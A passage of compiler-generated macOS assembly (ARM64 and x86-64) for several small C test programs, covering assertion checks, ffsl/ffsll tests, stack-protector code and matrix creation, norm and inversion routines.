16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___func__.main: ; @__func__.main .asciz "main" l_.str: ; @.str .asciz "59511681.c" l_.str.1: ; @.str.1 .asciz "j!=3" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $0, -8(%rbp) movl $2, -12(%rbp) cmpl $0, -8(%rbp) jne LBB0_2 ## %bb.1: movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) LBB0_2: cmpl $3, -12(%rbp) setne %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_4 ## %bb.3: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.1(%rip), %rcx movl $12, %edx callq ___assert_rtn LBB0_4: jmp LBB0_5 LBB0_5: movl -4(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___func__.main: ## @__func__.main .asciz "main" L_.str: ## @.str .asciz "59511681.c" L_.str.1: ## @.str.1 .asciz "j!=3" .subsections_via_symbols
the_stack_data/59511681.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _warn_global_array ; -- Begin function warn_global_array .p2align 2 _warn_global_array: ; @warn_global_array .cfi_startproc ; %bb.0: adrp x8, _ax@GOTPAGE ldr x8, [x8, _ax@GOTPAGEOFF] adrp x9, _a0@GOTPAGE ldr x9, [x9, _a0@GOTPAGEOFF] str wzr, [x9] stur wzr, [x8, #-4] ret .cfi_endproc ; -- End function .globl _warn_member_array ; -- Begin function warn_member_array .p2align 2 _warn_member_array: ; @warn_member_array .cfi_startproc ; %bb.0: adrp x9, _s0@GOTPAGE ldr x9, [x9, _s0@GOTPAGEOFF] adrp x8, _sx@PAGE add x8, x8, _sx@PAGEOFF str wzr, [x9, #4] str wzr, [x8, #4] ret .cfi_endproc ; -- End function .globl _sx ; @sx .zerofill __DATA,__common,_sx,4,2 .comm _s0,4,2 ; @s0 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _warn_global_array ## -- Begin function warn_global_array .p2align 4, 0x90 _warn_global_array: ## @warn_global_array .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _a0@GOTPCREL(%rip), %rax movl $0, (%rax) movq _ax@GOTPCREL(%rip), %rax movl $0, -4(%rax) popq %rbp retq .cfi_endproc ## -- End function .globl _warn_member_array ## -- Begin function warn_member_array .p2align 4, 0x90 _warn_member_array: ## @warn_member_array .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _s0@GOTPCREL(%rip), %rax movl $0, 4(%rax) movl $0, _sx+4(%rip) popq %rbp retq .cfi_endproc ## -- End function .globl _sx ## @sx .zerofill __DATA,__common,_sx,4,2 .comm _s0,4,2 ## @s0 .subsections_via_symbols
the_stack_data/64200034.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ; -- Begin function f .p2align 2 _f: ; @f .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str x0, [sp] ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: bl ___stack_chk_fail LBB0_2: mov w0, #92 ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _f ## -- Begin function f .p2align 4, 0x90 _f: ## @f .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -120(%rbp) movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_2 ## %bb.1: movl $92, %eax addq $128, %rsp popq %rbp retq LBB0_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/43889192.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x8, #-9223372036854775808 str x8, [sp, #16] str x8, [sp, #8] ldr x0, [sp, #16] bl _ffsl ; implicit-def: $x8 mov x8, x0 sxtw x8, w8 subs x8, x8, #64 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #8 adrp x3, l_.str.1@PAGE add x3, x3, l_.str.1@PAGEOFF bl ___assert_rtn LBB0_2: b LBB0_3 LBB0_3: ldr x0, [sp, #8] bl _ffsll ; implicit-def: $x8 mov x8, x0 sxtw x8, w8 subs x8, x8, #64 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #9 adrp x3, l_.str.2@PAGE add x3, x3, l_.str.2@PAGEOFF bl ___assert_rtn LBB0_5: b LBB0_6 LBB0_6: mov x0, #0 bl _ffsl subs w8, w0, #0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #10 adrp x3, l_.str.3@PAGE add x3, x3, l_.str.3@PAGEOFF bl ___assert_rtn LBB0_8: b LBB0_9 LBB0_9: mov x0, #0 bl _ffsll subs w8, w0, #0 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #11 adrp x3, l_.str.4@PAGE add x3, x3, l_.str.4@PAGEOFF bl ___assert_rtn LBB0_11: b LBB0_12 LBB0_12: ldr x0, [sp, #16] bl _ffsl str w0, [sp, #4] ; 4-byte Folded Spill ldr x0, [sp, #16] bl _ffsll mov x8, x0 ldr w0, [sp, #4] ; 4-byte Folded Reload subs w8, w0, w8 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #12 adrp x3, l_.str.5@PAGE add x3, x3, l_.str.5@PAGEOFF bl ___assert_rtn LBB0_14: b LBB0_15 LBB0_15: ldr x0, [sp, #8] bl _ffsl str w0, [sp] ; 4-byte Folded Spill ldr x0, [sp, #8] bl _ffsll mov x8, x0 ldr w0, [sp] ; 4-byte Folded Reload subs w8, w0, w8 cset w9, ne ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_17 b LBB0_16 LBB0_16: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #16 adrp x3, l_.str.6@PAGE add x3, x3, l_.str.6@PAGEOFF bl ___assert_rtn LBB0_17: b LBB0_18 LBB0_18: mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___func__.main: ; @__func__.main .asciz "main" l_.str: ; @.str .asciz "877445.c" l_.str.1: ; @.str.1 .asciz "ffsl(test1) == sizeof(long) * 8" l_.str.2: ; @.str.2 .asciz "ffsll(test2) == sizeof(long long) * 8" l_.str.3: ; @.str.3 .asciz "ffsl(0) == 0" l_.str.4: ; @.str.4 .asciz "ffsll(0) == 0" l_.str.5: ; @.str.5 .asciz "ffsl(test1) == ffsll(test1)" l_.str.6: ; @.str.6 .asciz "ffsl(test2) == ffsll(test2)" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movabsq $-9223372036854775808, %rax ## imm = 0x8000000000000000 movq %rax, -16(%rbp) movabsq $-9223372036854775808, %rax ## imm = 0x8000000000000000 movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _ffsl cltq cmpq $64, %rax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_2 ## %bb.1: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.1(%rip), %rcx movl $8, %edx callq ___assert_rtn LBB0_2: jmp LBB0_3 LBB0_3: movq -24(%rbp), %rdi callq _ffsll cltq cmpq $64, %rax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_5 ## %bb.4: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.2(%rip), %rcx movl $9, %edx callq ___assert_rtn LBB0_5: jmp LBB0_6 LBB0_6: xorl %eax, %eax movl %eax, %edi callq _ffsl cmpl $0, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_8 ## %bb.7: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.3(%rip), %rcx movl $10, %edx callq ___assert_rtn LBB0_8: jmp LBB0_9 LBB0_9: xorl %eax, %eax movl %eax, %edi callq _ffsll cmpl $0, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_11 ## %bb.10: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.4(%rip), %rcx movl $11, %edx callq ___assert_rtn LBB0_11: jmp LBB0_12 LBB0_12: movq -16(%rbp), %rdi callq _ffsl movl %eax, -28(%rbp) ## 4-byte Spill movq -16(%rbp), %rdi callq _ffsll movl %eax, %ecx movl -28(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_14 ## %bb.13: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.5(%rip), %rcx movl $12, %edx callq ___assert_rtn LBB0_14: jmp LBB0_15 LBB0_15: movq -24(%rbp), %rdi callq _ffsl movl %eax, -32(%rbp) ## 4-byte Spill movq -24(%rbp), %rdi callq _ffsll movl %eax, %ecx movl -32(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax sete %al xorb $-1, %al andb $1, %al movzbl %al, %eax cltq cmpq $0, %rax je LBB0_17 ## %bb.16: leaq L___func__.main(%rip), %rdi leaq L_.str(%rip), %rsi leaq L_.str.6(%rip), %rcx movl $16, %edx callq ___assert_rtn LBB0_17: jmp LBB0_18 LBB0_18: xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L___func__.main: ## @__func__.main .asciz "main" L_.str: ## @.str .asciz "877445.c" L_.str.1: ## @.str.1 .asciz "ffsl(test1) == sizeof(long) * 8" L_.str.2: ## @.str.2 .asciz "ffsll(test2) == sizeof(long long) * 8" L_.str.3: ## @.str.3 .asciz "ffsl(0) == 0" L_.str.4: ## @.str.4 .asciz "ffsll(0) == 0" L_.str.5: ## @.str.5 .asciz "ffsl(test1) == ffsll(test1)" L_.str.6: ## @.str.6 .asciz "ffsl(test2) == ffsll(test2)" .subsections_via_symbols
the_stack_data/877445.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _CreateMatrix ; -- Begin function CreateMatrix .p2align 2 _CreateMatrix: ; @CreateMatrix .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str wzr, [sp, #16] ldursw x9, [x29, #-4] mov x8, #8 mul x8, x8, x9 ldursw x9, [x29, #-4] mul x0, x8, x9 bl _malloc str x0, [sp, #8] stur wzr, [x29, #-8] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldur w8, [x29, #-8] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 movi d0, #0000000000000000 str d0, [sp] stur wzr, [x29, #-12] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-12] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 bl _rand mov w9, #9 sdiv w8, w0, w9 mul w8, w8, w9 subs w8, w0, w8 add w8, w8, #1 str w8, [sp, #16] ldr s1, [sp, #16] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d0, d0 ldr x8, [sp, #8] ldur w9, [x29, #-8] ldur w10, [x29, #-4] mul w9, w9, w10 ldur w10, [x29, #-12] add w9, w9, w10 str d0, [x8, w9, sxtw #3] ldr s1, [sp, #16] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d1, d0 ldr d0, [sp] fadd d0, d0, d1 str d0, [sp] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldr d0, [sp] fmov d1, #5.00000000 fadd d0, d0, d1 ldr x8, [sp, #8] ldur w9, [x29, #-8] ldur w10, [x29, #-4] mul w9, w9, w10 ldur w10, [x29, #-8] add w9, w9, w10 str d0, [x8, w9, sxtw #3] b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB0_1 LBB0_8: ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _CreateVector ; -- Begin function CreateVector .p2align 2 _CreateVector: ; @CreateVector .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldursw x9, [x29, #-4] mov x8, #8 mul x0, x8, x9 bl _malloc str x0, [sp] str wzr, [sp, #8] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 bl _rand mov w9, #10 sdiv w8, w0, w9 mul w8, w8, w9 subs w8, w0, w8 scvtf d0, w8 ldr x8, [sp] ldrsw x9, [sp, #8] str d0, [x8, x9, lsl #3] b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB1_1 LBB1_4: ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _GetCond ; -- Begin function GetCond .p2align 2 _GetCond: ; @GetCond .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldur x0, [x29, #-8] ldur w1, [x29, #-12] bl _NormMatrix str d0, [sp, #8] ; 8-byte Folded Spill ldur x0, [x29, #-8] ldur w1, [x29, #-12] bl _InvMatrix ldur w1, [x29, #-12] bl _NormMatrix fmov d1, d0 ldr d0, [sp, #8] ; 8-byte Folded Reload fmul d0, d0, d1 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _NormMatrix ; -- Begin function NormMatrix .p2align 2 _NormMatrix: ; @NormMatrix .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 str x0, [sp, #40] str w1, [sp, #36] movi d0, #0000000000000000 str d0, [sp, #16] str d0, [sp, #8] str wzr, [sp, #32] b LBB3_1 LBB3_1: ; =>This Loop Header: Depth=1 ; Child Loop BB3_3 Depth 2 ldr w8, [sp, #32] ldr w9, [sp, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_8 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 str wzr, [sp, #28] b LBB3_3 LBB3_3: ; Parent Loop BB3_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #28] ldr w9, [sp, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_6 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=2 ldr x8, [sp, #40] ldr w9, [sp, #32] ldr w10, [sp, #36] mul w9, w9, w10 ldr w10, [sp, #28] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr x8, [sp, #40] ldr w9, [sp, #32] ldr w10, [sp, #36] mul w9, w9, w10 ldr w10, [sp, #28] add w9, w9, w10 ldr d1, [x8, w9, sxtw #3] ldr d2, [sp, #8] fmadd d0, d0, d1, d2 str d0, [sp, #8] b LBB3_5 LBB3_5: ; in Loop: Header=BB3_3 Depth=2 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB3_3 LBB3_6: ; in Loop: Header=BB3_1 Depth=1 b LBB3_7 LBB3_7: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB3_1 LBB3_8: ldr d0, [sp, #8] fsqrt d0, d0 str d0, [sp, #16] ldr d0, [sp, #16] add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _InvMatrix ; -- Begin function InvMatrix .p2align 2 _InvMatrix: ; @InvMatrix .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldursw x9, [x29, #-12] mov x8, #8 str x8, [sp, #8] ; 8-byte Folded Spill mul x8, x8, x9 ldursw x9, [x29, #-12] mul x0, x8, x9 bl _malloc ldr x8, [sp, #8] ; 8-byte Folded Reload str x0, [sp, #24] ldursw x9, [x29, #-12] mul x8, x8, x9 ldursw x9, [x29, #-12] mul x0, x8, x9 bl _malloc str x0, [sp, #16] stur wzr, [x29, #-16] b LBB4_1 LBB4_1: ; =>This Loop Header: Depth=1 ; Child Loop BB4_3 Depth 2 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_8 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 stur wzr, [x29, #-20] b LBB4_3 LBB4_3: ; Parent Loop BB4_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_6 b LBB4_4 LBB4_4: ; in Loop: Header=BB4_3 Depth=2 ldur x8, [x29, #-8] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr x8, [sp, #16] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 str d0, [x8, w9, sxtw #3] b LBB4_5 LBB4_5: ; in Loop: Header=BB4_3 Depth=2 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_3 LBB4_6: ; in Loop: Header=BB4_1 Depth=1 b LBB4_7 LBB4_7: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB4_1 LBB4_8: stur wzr, [x29, #-16] b LBB4_9 LBB4_9: ; =>This Loop Header: Depth=1 ; Child Loop BB4_11 Depth 2 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_18 b LBB4_10 LBB4_10: ; in Loop: Header=BB4_9 Depth=1 stur wzr, [x29, #-20] b LBB4_11 LBB4_11: ; Parent Loop BB4_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_16 b LBB4_12 LBB4_12: ; in Loop: Header=BB4_11 Depth=2 ldr x8, [sp, #24] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 movi d0, #0000000000000000 str d0, [x8, w9, sxtw #3] ldur w8, [x29, #-16] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB4_14 b LBB4_13 LBB4_13: ; in Loop: Header=BB4_11 Depth=2 ldr x8, [sp, #24] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 fmov d0, #1.00000000 str d0, [x8, w9, sxtw #3] b LBB4_14 LBB4_14: ; in Loop: Header=BB4_11 Depth=2 b LBB4_15 LBB4_15: ; in Loop: Header=BB4_11 Depth=2 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_11 LBB4_16: ; in Loop: Header=BB4_9 Depth=1 b LBB4_17 LBB4_17: ; in Loop: Header=BB4_9 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB4_9 LBB4_18: stur wzr, [x29, #-24] b LBB4_19 LBB4_19: ; =>This Loop Header: Depth=1 ; Child Loop BB4_21 Depth 2 ; Child Loop BB4_25 Depth 2 ; Child Loop BB4_27 Depth 3 ldur w8, [x29, #-24] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_34 b LBB4_20 LBB4_20: ; in Loop: Header=BB4_19 Depth=1 ldr x8, [sp, #16] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-24] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] str d0, [sp, #32] stur wzr, [x29, #-20] b LBB4_21 LBB4_21: ; Parent Loop BB4_19 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_24 b LBB4_22 LBB4_22: ; in Loop: Header=BB4_21 Depth=2 ldr d1, [sp, #32] ldr x8, [sp, #16] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d0, [x8] fdiv d0, d0, d1 str d0, [x8] ldr d1, [sp, #32] ldr x8, [sp, #24] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d0, [x8] fdiv d0, d0, d1 str d0, [x8] b LBB4_23 LBB4_23: ; in Loop: Header=BB4_21 Depth=2 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_21 LBB4_24: ; in Loop: Header=BB4_19 Depth=1 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-16] b LBB4_25 LBB4_25: ; Parent Loop BB4_19 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB4_27 Depth 3 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_32 b LBB4_26 LBB4_26: ; in Loop: Header=BB4_25 Depth=2 ldr x8, [sp, #16] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-24] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] str d0, [sp, #32] stur wzr, [x29, #-20] b LBB4_27 LBB4_27: ; Parent Loop BB4_19 Depth=1 ; Parent Loop BB4_25 Depth=2 ; => This Inner Loop Header: Depth=3 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_30 b LBB4_28 LBB4_28: ; in Loop: Header=BB4_27 Depth=3 ldr x8, [sp, #16] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr d1, [sp, #32] ldr x8, [sp, #16] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d2, [x8] fmsub d0, d0, d1, d2 str d0, [x8] ldr x8, [sp, #24] ldur w9, [x29, #-24] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 ldr d0, [x8, w9, sxtw #3] ldr d1, [sp, #32] ldr x8, [sp, #24] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-20] add w9, w9, w10 add x8, x8, w9, sxtw #3 ldr d2, [x8] fmsub d0, d0, d1, d2 str d0, [x8] b LBB4_29 LBB4_29: ; in Loop: Header=BB4_27 Depth=3 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_27 LBB4_30: ; in Loop: Header=BB4_25 Depth=2 b LBB4_31 LBB4_31: ; in Loop: Header=BB4_25 Depth=2 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB4_25 LBB4_32: ; in Loop: Header=BB4_19 Depth=1 b LBB4_33 LBB4_33: ; in Loop: Header=BB4_19 Depth=1 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-24] b LBB4_19 LBB4_34: ldur w8, [x29, #-12] subs w8, w8, #1 stur w8, [x29, #-24] b LBB4_35 LBB4_35: ; =>This Loop Header: Depth=1 ; Child Loop BB4_37 Depth 2 ; Child Loop BB4_39 Depth 3 ldur w8, [x29, #-24] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB4_46 b LBB4_36 LBB4_36: ; in Loop: Header=BB4_35 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #1 stur w8, [x29, #-16] b LBB4_37 LBB4_37: ; Parent Loop BB4_35 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB4_39 Depth 3 ldur w8, [x29, #-16] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB4_44 b LBB4_38 LBB4_38: ; in Loop: Header=BB4_37 Depth=2 ldr x8, [sp, #16] ldur w9, [x29, #-16] ldur w10, [x29, #-12] mul w9, w9, w10 ldur w10, [x29, #-24] add w9, w9, w10 ldr d0, [x8, 